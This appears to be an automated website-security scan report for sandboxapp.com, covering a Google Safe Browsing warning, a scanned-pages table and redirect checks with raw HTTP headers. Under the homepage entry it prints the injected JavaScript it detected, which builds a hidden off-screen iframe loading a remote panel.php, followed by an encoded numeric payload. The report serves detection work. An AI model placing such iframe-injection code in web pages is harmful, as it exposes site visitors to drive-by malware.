Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sandboxapp.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sandboxapp.com/ | 200 OK Content-Length: 141933 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://www.makoma.mok.waw.pl/panel.php');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Decoded script: [168,0,-116,56,-32,64,-80,120,-4,-52,12,-88,152,-44,-60,-92,44,108,-76,-72,40,88,-88,152,-44,-36,52,-160,52,-48,-12,84,-72,120,-88,92,4,-112,148,-120,-48,132,-28,-116,160,-8,-36,-80,132,0,0,-116,56,-52,-40,120,-88,8,84,-24,-12,64,0,28,-120,-28,-40,112,-72,28,-40,132,0,0,-108,120,-4,-52,12,-88,152,-44,-60,-28,-12,-4,104,-108,92,48,-60,-76,56,-52,-40,120,-88,28,44,-64,120,-148,116,-52,64,0,-84,40,-72,0,108,-132,120,-44,32,-40,116,-108,4,80,-28,-52 ...[95696 bytes skipped]... Antivirus reports:
| ||
http://sandboxapp.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sandboxapp.com
Result:
HTTP/1.1 200 OK
Date: Sun, 11 Jan 2015 10:44:28 GMT
Accept-Ranges: bytes
ETag: "619d1a5b43b1cd1:0"
Server: Microsoft-IIS/8.0
Content-Length: 141933
Content-Type: text/html
Last-Modified: Tue, 23 Oct 2012 17:25:11 GMT
X-Powered-By: ASP.NET
...141933 bytes of data.
GET / HTTP/1.1
Host: sandboxapp.com
Result:
HTTP/1.1 200 OK
Date: Sun, 11 Jan 2015 10:44:28 GMT
Accept-Ranges: bytes
ETag: "619d1a5b43b1cd1:0"
Server: Microsoft-IIS/8.0
Content-Length: 141933
Content-Type: text/html
Last-Modified: Tue, 23 Oct 2012 17:25:11 GMT
X-Powered-By: ASP.NET
...141933 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sandboxapp.com
Referer: http://www.google.com/search?q=sandboxapp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sandboxapp.com
Referer: http://www.google.com/search?q=sandboxapp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.